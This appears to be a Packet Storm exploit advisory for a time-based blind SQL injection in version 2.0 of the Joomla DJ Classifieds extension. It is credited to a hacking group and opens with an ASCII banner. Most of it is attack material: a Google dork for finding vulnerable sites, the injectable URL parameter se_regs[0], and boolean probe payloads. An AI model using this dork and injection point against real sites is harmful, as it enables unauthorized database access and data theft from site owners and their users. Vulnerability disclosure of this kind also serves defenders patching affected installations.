Joomla DJ Classifieds Extension component version 2.0 suffers from a remote blind SQL injection vulnerability.
3703cc31e5f10951bfd6e5534ddd70a4eaffe8cfee40eca7999ac64d25de08b6$$$$$$\ $$\ $$\ $$$$$$\
$$ __$$\ $$ | $$ | $$ __$$\
$$ / \__| $$ | $$ | $$ / \__|
$$ |$$$$\ $$$$$$$$ | \$$$$$$\
$$ |\_$$ | $$ __$$ | \____$$\
$$ | $$ | $$ | $$ | $$\ $$ |
\$$$$$$ |$$\ $$ | $$ |$$\\$$$$$$ |
\______/ \__|\__| \__|\__|\______/
# Exploit Title: Joomla - DJ Classifieds - Time-Based Blind SQL Injection
# Google Dork: inurl:"index.php/dj-classifieds/" or inurl:"/dj-classifieds/"
# Date: 4/5/2013
# Exploit Author: Napsterakos
# Vendor Homepage: http://design-joomla.eu
# Software Link: -
# Version: 2.0
# Tested on: Linux
Link: http://server/joomla/index.php/dj-classifieds/
Exploit: http://server/joomla/index.php/dj-classifieds/ads/0/?limitstart=0&se=1&se_regs[0]=[SQLi]
# Exploit-DB Note:
# dj-classifieds/ads/0/?limitstart=0&se=1&se_regs[0]=1 and 1=0
# dj-classifieds/ads/0/?limitstart=0&se=1&se_regs[0]=1 and 1=1
Credits to: Greek Hacking Scene
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed